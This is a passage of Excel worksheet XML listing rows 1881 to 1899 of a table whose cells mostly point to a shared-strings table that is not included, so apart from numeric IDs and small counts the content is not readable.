        <v>10414</v>
      </c>
      <c r="Q1881" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1881" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1881" s="12" t="s">
        <v>13608</v>
      </c>
      <c r="T1881" s="12" t="s">
        <v>5053</v>
      </c>
      <c r="U1881" s="12" t="s">
        <v>13609</v>
      </c>
      <c r="V1881" s="12" t="s">
        <v>3725</v>
      </c>
      <c r="W1881" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1881" s="12">
        <v>14</v>
      </c>
      <c r="Y1881" s="12" t="s">
        <v>13610</v>
      </c>
    </row>
    <row r="1882" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1882" s="12">
        <v>9919</v>
      </c>
      <c r="B1882" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1882" s="12" t="s">
        <v>30155</v>
      </c>
      <c r="E1882" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1882" s="12" t="s">
        <v>30204</v>
      </c>
      <c r="G1882" s="12" t="s">
        <v>13611</v>
      </c>
      <c r="H1882" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1882" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1882" s="12" t="s">
        <v>201</v>
      </c>
      <c r="K1882" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1882" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1882" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1882" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1882" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1882" s="12" t="s">
        <v>10414</v>
      </c>
      <c r="Q1882" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1882" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1882" s="12" t="s">
        <v>13612</v>
      </c>
      <c r="T1882" s="12" t="s">
        <v>2661</v>
      </c>
      <c r="U1882" s="12" t="s">
        <v>13613</v>
      </c>
      <c r="V1882" s="12" t="s">
        <v>3399</v>
      </c>
      <c r="W1882" s="12" t="s">
        <v>13614</v>
      </c>
      <c r="X1882" s="12">
        <v>26</v>
      </c>
      <c r="Y1882" s="12" t="s">
        <v>13615</v>
      </c>
    </row>
    <row r="1883" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1883" s="12">
        <v>9924</v>
      </c>
      <c r="B1883" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1883" s="12" t="s">
        <v>31189</v>
      </c>
      <c r="E1883" s="12" t="s">
        <v>31532</v>
      </c>
      <c r="F1883" s="12" t="s">
        <v>31205</v>
      </c>
      <c r="G1883" s="12" t="s">
        <v>13616</v>
      </c>
      <c r="H1883" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1883" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J1883" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1883" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1883" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M1883" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1883" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1883" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1883" s="12" t="s">
        <v>10414</v>
      </c>
      <c r="Q1883" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1883" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1883" s="12" t="s">
        <v>13617</v>
      </c>
      <c r="T1883" s="12" t="s">
        <v>13618</v>
      </c>
      <c r="U1883" s="12" t="s">
        <v>13619</v>
      </c>
      <c r="V1883" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W1883" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1883" s="12">
        <v>7</v>
      </c>
      <c r="Y1883" s="12" t="s">
        <v>13620</v>
      </c>
    </row>
    <row r="1884" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1884" s="12">
        <v>9926</v>
      </c>
      <c r="B1884" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1884" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E1884" s="12" t="s">
        <v>31435</v>
      </c>
      <c r="F1884" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G1884" s="12" t="s">
        <v>13621</v>
      </c>
      <c r="H1884" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1884" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J1884" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1884" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1884" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M1884" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1884" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1884" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1884" s="12" t="s">
        <v>13622</v>
      </c>
      <c r="Q1884" s="12" t="s">
        <v>28284</v>
      </c>
      <c r="R1884" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1884" s="12" t="s">
        <v>13623</v>
      </c>
      <c r="T1884" s="12" t="s">
        <v>13624</v>
      </c>
      <c r="U1884" s="12" t="s">
        <v>13625</v>
      </c>
      <c r="V1884" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W1884" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1884" s="12">
        <v>2</v>
      </c>
      <c r="Y1884" s="12" t="s">
        <v>13626</v>
      </c>
    </row>
    <row r="1885" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1885" s="12">
        <v>9928</v>
      </c>
      <c r="B1885" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1885" s="12" t="s">
        <v>30440</v>
      </c>
      <c r="F1885" s="12" t="s">
        <v>30441</v>
      </c>
      <c r="G1885" s="12" t="s">
        <v>13627</v>
      </c>
      <c r="H1885" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1885" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J1885" s="12" t="s">
        <v>23</v>
      </c>
      <c r="K1885" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1885" s="12" t="s">
        <v>11596</v>
      </c>
      <c r="M1885" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N1885" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O1885" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1885" s="12" t="s">
        <v>13628</v>
      </c>
      <c r="Q1885" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1885" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1885" s="12" t="s">
        <v>13629</v>
      </c>
      <c r="T1885" s="12" t="s">
        <v>7010</v>
      </c>
      <c r="U1885" s="12" t="s">
        <v>13630</v>
      </c>
      <c r="V1885" s="12" t="s">
        <v>3738</v>
      </c>
      <c r="W1885" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1885" s="12">
        <v>5</v>
      </c>
      <c r="Y1885" s="12" t="s">
        <v>13631</v>
      </c>
    </row>
    <row r="1886" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1886" s="12">
        <v>9937</v>
      </c>
      <c r="B1886" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D1886" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1886" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1886" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="G1886" s="12" t="s">
        <v>13637</v>
      </c>
      <c r="H1886" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1886" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J1886" s="12" t="s">
        <v>139</v>
      </c>
      <c r="K1886" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1886" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M1886" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1886" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1886" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1886" s="12" t="s">
        <v>10337</v>
      </c>
      <c r="Q1886" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1886" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1886" s="12" t="s">
        <v>13638</v>
      </c>
      <c r="T1886" s="12" t="s">
        <v>13639</v>
      </c>
      <c r="U1886" s="12" t="s">
        <v>13640</v>
      </c>
      <c r="V1886" s="12" t="s">
        <v>995</v>
      </c>
      <c r="W1886" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1886" s="12">
        <v>3</v>
      </c>
      <c r="Y1886" s="12" t="s">
        <v>13641</v>
      </c>
    </row>
    <row r="1887" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1887" s="12">
        <v>9939</v>
      </c>
      <c r="B1887" s="12" t="s">
        <v>28354</v>
      </c>
      <c r="D1887" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1887" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1887" s="12" t="s">
        <v>30463</v>
      </c>
      <c r="G1887" s="12" t="s">
        <v>13643</v>
      </c>
      <c r="H1887" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1887" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1887" s="12" t="s">
        <v>9219</v>
      </c>
      <c r="K1887" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1887" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1887" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1887" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1887" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1887" s="12" t="s">
        <v>13642</v>
      </c>
      <c r="Q1887" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1887" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1887" s="12" t="s">
        <v>13644</v>
      </c>
      <c r="T1887" s="12" t="s">
        <v>13645</v>
      </c>
      <c r="U1887" s="12" t="s">
        <v>13609</v>
      </c>
      <c r="V1887" s="12" t="s">
        <v>3725</v>
      </c>
      <c r="W1887" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1887" s="12">
        <v>27</v>
      </c>
      <c r="Y1887" s="12" t="s">
        <v>13646</v>
      </c>
    </row>
    <row r="1888" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1888" s="12">
        <v>9940</v>
      </c>
      <c r="B1888" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D1888" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1888" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F1888" s="12" t="s">
        <v>29758</v>
      </c>
      <c r="G1888" s="12" t="s">
        <v>13647</v>
      </c>
      <c r="H1888" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1888" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1888" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K1888" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1888" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1888" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1888" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1888" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1888" s="12" t="s">
        <v>10414</v>
      </c>
      <c r="Q1888" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1888" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1888" s="12" t="s">
        <v>13648</v>
      </c>
      <c r="T1888" s="12" t="s">
        <v>13649</v>
      </c>
      <c r="U1888" s="12" t="s">
        <v>13650</v>
      </c>
      <c r="V1888" s="12" t="s">
        <v>9410</v>
      </c>
      <c r="W1888" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1888" s="12">
        <v>8</v>
      </c>
      <c r="Y1888" s="12" t="s">
        <v>13651</v>
      </c>
    </row>
    <row r="1889" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1889" s="12">
        <v>9944</v>
      </c>
      <c r="B1889" s="12" t="s">
        <v>28354</v>
      </c>
      <c r="D1889" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1889" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1889" s="12" t="s">
        <v>30463</v>
      </c>
      <c r="G1889" s="12" t="s">
        <v>13652</v>
      </c>
      <c r="H1889" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1889" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1889" s="12" t="s">
        <v>201</v>
      </c>
      <c r="K1889" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1889" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1889" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1889" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1889" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1889" s="12" t="s">
        <v>13642</v>
      </c>
      <c r="Q1889" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1889" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1889" s="12" t="s">
        <v>13653</v>
      </c>
      <c r="T1889" s="12" t="s">
        <v>13654</v>
      </c>
      <c r="U1889" s="12" t="s">
        <v>13655</v>
      </c>
      <c r="V1889" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W1889" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1889" s="12">
        <v>6</v>
      </c>
      <c r="Y1889" s="12" t="s">
        <v>13656</v>
      </c>
    </row>
    <row r="1890" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1890" s="12">
        <v>9947</v>
      </c>
      <c r="B1890" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1890" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1890" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F1890" s="12" t="s">
        <v>30368</v>
      </c>
      <c r="G1890" s="12" t="s">
        <v>13658</v>
      </c>
      <c r="H1890" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1890" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J1890" s="12" t="s">
        <v>3068</v>
      </c>
      <c r="K1890" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1890" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1890" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1890" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1890" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1890" s="12" t="s">
        <v>13642</v>
      </c>
      <c r="Q1890" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1890" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1890" s="12" t="s">
        <v>13659</v>
      </c>
      <c r="T1890" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1890" s="12" t="s">
        <v>13660</v>
      </c>
      <c r="V1890" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W1890" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1890" s="12">
        <v>1</v>
      </c>
      <c r="Y1890" s="12" t="s">
        <v>13661</v>
      </c>
    </row>
    <row r="1891" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1891" s="12">
        <v>9948</v>
      </c>
      <c r="B1891" s="12" t="s">
        <v>30520</v>
      </c>
      <c r="C1891" s="12" t="s">
        <v>30521</v>
      </c>
      <c r="D1891" s="12" t="s">
        <v>30522</v>
      </c>
      <c r="E1891" s="12" t="s">
        <v>31516</v>
      </c>
      <c r="F1891" s="12" t="s">
        <v>30505</v>
      </c>
      <c r="G1891" s="12" t="s">
        <v>13662</v>
      </c>
      <c r="H1891" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1891" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J1891" s="12" t="s">
        <v>166</v>
      </c>
      <c r="K1891" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1891" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1891" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1891" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1891" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1891" s="12" t="s">
        <v>13663</v>
      </c>
      <c r="Q1891" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1891" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1891" s="12" t="s">
        <v>13664</v>
      </c>
      <c r="T1891" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1891" s="12" t="s">
        <v>13665</v>
      </c>
      <c r="V1891" s="12" t="s">
        <v>167</v>
      </c>
      <c r="W1891" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1891" s="12">
        <v>7</v>
      </c>
      <c r="Y1891" s="12" t="s">
        <v>13666</v>
      </c>
    </row>
    <row r="1892" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1892" s="12">
        <v>9949</v>
      </c>
      <c r="B1892" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1892" s="12" t="s">
        <v>30840</v>
      </c>
      <c r="E1892" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F1892" s="12" t="s">
        <v>30152</v>
      </c>
      <c r="G1892" s="12" t="s">
        <v>13667</v>
      </c>
      <c r="H1892" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1892" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J1892" s="12" t="s">
        <v>23</v>
      </c>
      <c r="K1892" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1892" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1892" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1892" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1892" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1892" s="12" t="s">
        <v>13642</v>
      </c>
      <c r="Q1892" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1892" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1892" s="12" t="s">
        <v>13668</v>
      </c>
      <c r="T1892" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1892" s="12" t="s">
        <v>13669</v>
      </c>
      <c r="V1892" s="12" t="s">
        <v>3738</v>
      </c>
      <c r="W1892" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1892" s="12">
        <v>1</v>
      </c>
      <c r="Y1892" s="12" t="s">
        <v>13670</v>
      </c>
    </row>
    <row r="1893" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1893" s="12">
        <v>9950</v>
      </c>
      <c r="B1893" s="12" t="s">
        <v>30144</v>
      </c>
      <c r="C1893" s="12" t="s">
        <v>30145</v>
      </c>
      <c r="D1893" s="12" t="s">
        <v>30146</v>
      </c>
      <c r="F1893" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1893" s="12" t="s">
        <v>13671</v>
      </c>
      <c r="H1893" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1893" s="12" t="s">
        <v>925</v>
      </c>
      <c r="J1893" s="12" t="s">
        <v>926</v>
      </c>
      <c r="K1893" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1893" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1893" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1893" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1893" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1893" s="12" t="s">
        <v>13672</v>
      </c>
      <c r="Q1893" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1893" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1893" s="12" t="s">
        <v>13673</v>
      </c>
      <c r="T1893" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1893" s="12" t="s">
        <v>13674</v>
      </c>
      <c r="V1893" s="12" t="s">
        <v>5069</v>
      </c>
      <c r="W1893" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1893" s="12">
        <v>1</v>
      </c>
      <c r="Y1893" s="12" t="s">
        <v>13675</v>
      </c>
    </row>
    <row r="1894" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1894" s="12">
        <v>9954</v>
      </c>
      <c r="B1894" s="12" t="s">
        <v>30674</v>
      </c>
      <c r="D1894" s="12" t="s">
        <v>30680</v>
      </c>
      <c r="F1894" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1894" s="12" t="s">
        <v>13680</v>
      </c>
      <c r="H1894" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1894" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1894" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K1894" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1894" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1894" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1894" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1894" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1894" s="12" t="s">
        <v>13681</v>
      </c>
      <c r="Q1894" s="12">
        <v>2.5</v>
      </c>
      <c r="R1894" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1894" s="12" t="s">
        <v>13682</v>
      </c>
      <c r="T1894" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1894" s="12" t="s">
        <v>13683</v>
      </c>
      <c r="V1894" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W1894" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1894" s="12">
        <v>3</v>
      </c>
      <c r="Y1894" s="12" t="s">
        <v>13684</v>
      </c>
    </row>
    <row r="1895" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1895" s="12">
        <v>9955</v>
      </c>
      <c r="B1895" s="12" t="s">
        <v>30304</v>
      </c>
      <c r="D1895" s="12" t="s">
        <v>30303</v>
      </c>
      <c r="F1895" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1895" s="12" t="s">
        <v>13685</v>
      </c>
      <c r="H1895" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1895" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1895" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K1895" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1895" s="12" t="s">
        <v>4026</v>
      </c>
      <c r="M1895" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N1895" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O1895" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1895" s="12" t="s">
        <v>13628</v>
      </c>
      <c r="Q1895" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1895" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1895" s="12" t="s">
        <v>13686</v>
      </c>
      <c r="T1895" s="12" t="s">
        <v>13687</v>
      </c>
      <c r="U1895" s="12" t="s">
        <v>13688</v>
      </c>
      <c r="V1895" s="12" t="s">
        <v>2476</v>
      </c>
      <c r="W1895" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1895" s="12">
        <v>2</v>
      </c>
      <c r="Y1895" s="12" t="s">
        <v>13689</v>
      </c>
    </row>
    <row r="1896" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1896" s="12">
        <v>9960</v>
      </c>
      <c r="B1896" s="12" t="s">
        <v>30884</v>
      </c>
      <c r="C1896" s="12" t="s">
        <v>28406</v>
      </c>
      <c r="D1896" s="12" t="s">
        <v>30913</v>
      </c>
      <c r="E1896" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F1896" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1896" s="12" t="s">
        <v>13695</v>
      </c>
      <c r="H1896" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1896" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J1896" s="12" t="s">
        <v>3174</v>
      </c>
      <c r="K1896" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1896" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1896" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1896" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1896" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1896" s="12" t="s">
        <v>13696</v>
      </c>
      <c r="Q1896" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1896" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1896" s="12" t="s">
        <v>13697</v>
      </c>
      <c r="T1896" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1896" s="12" t="s">
        <v>13698</v>
      </c>
      <c r="V1896" s="12" t="s">
        <v>3174</v>
      </c>
      <c r="W1896" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1896" s="12">
        <v>4</v>
      </c>
      <c r="Y1896" s="12" t="s">
        <v>13699</v>
      </c>
    </row>
    <row r="1897" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1897" s="12">
        <v>9962</v>
      </c>
      <c r="B1897" s="12" t="s">
        <v>30674</v>
      </c>
      <c r="D1897" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1897" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1897" s="12" t="s">
        <v>13700</v>
      </c>
      <c r="H1897" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1897" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J1897" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1897" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1897" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1897" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1897" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1897" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1897" s="12" t="s">
        <v>13701</v>
      </c>
      <c r="Q1897" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1897" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1897" s="12" t="s">
        <v>13702</v>
      </c>
      <c r="T1897" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1897" s="12" t="s">
        <v>13703</v>
      </c>
      <c r="V1897" s="12" t="s">
        <v>3527</v>
      </c>
      <c r="W1897" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1897" s="12">
        <v>7</v>
      </c>
      <c r="Y1897" s="12" t="s">
        <v>13704</v>
      </c>
    </row>
    <row r="1898" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1898" s="12">
        <v>9966</v>
      </c>
      <c r="B1898" s="12" t="s">
        <v>30914</v>
      </c>
      <c r="D1898" s="12" t="s">
        <v>30913</v>
      </c>
      <c r="E1898" s="12" t="s">
        <v>31454</v>
      </c>
      <c r="F1898" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1898" s="12" t="s">
        <v>13713</v>
      </c>
      <c r="H1898" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1898" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J1898" s="12" t="s">
        <v>1724</v>
      </c>
      <c r="K1898" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1898" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1898" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1898" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1898" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1898" s="12" t="s">
        <v>13714</v>
      </c>
      <c r="Q1898" s="12" t="s">
        <v>28336</v>
      </c>
      <c r="R1898" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1898" s="12" t="s">
        <v>13715</v>
      </c>
      <c r="T1898" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1898" s="12" t="s">
        <v>13716</v>
      </c>
      <c r="V1898" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W1898" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1898" s="12">
        <v>33</v>
      </c>
      <c r="Y1898" s="12" t="s">
        <v>13717</v>
      </c>
    </row>
    <row r="1899" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1899" s="12">
        <v>9969</v>
      </c>
      <c r="B1899" s="12" t="s">
        <v>30907</v>
      </c>
      <c r="D1899" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1899" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1899" s="12" t="s">
        <v>13722</v>
      </c>
      <c r="H1899" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1899" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J1899" s="12" t="s">
        <v>23</v>
      </c>
      <c r="K1899" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1899" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1899" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1899" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1899" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1899" s="12" t="s">
        <v>13723</v>
      </c>
      <c r="Q1899" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1899" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1899" s="12" t="s">
        <v>13724</v>
      </c>
      <c r="T1899" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1899" s="12" t="s">
        <v>13725</v>
      </c>
      <c r="V1899" s="12" t="s">
        <v>3738</v>
      </c>
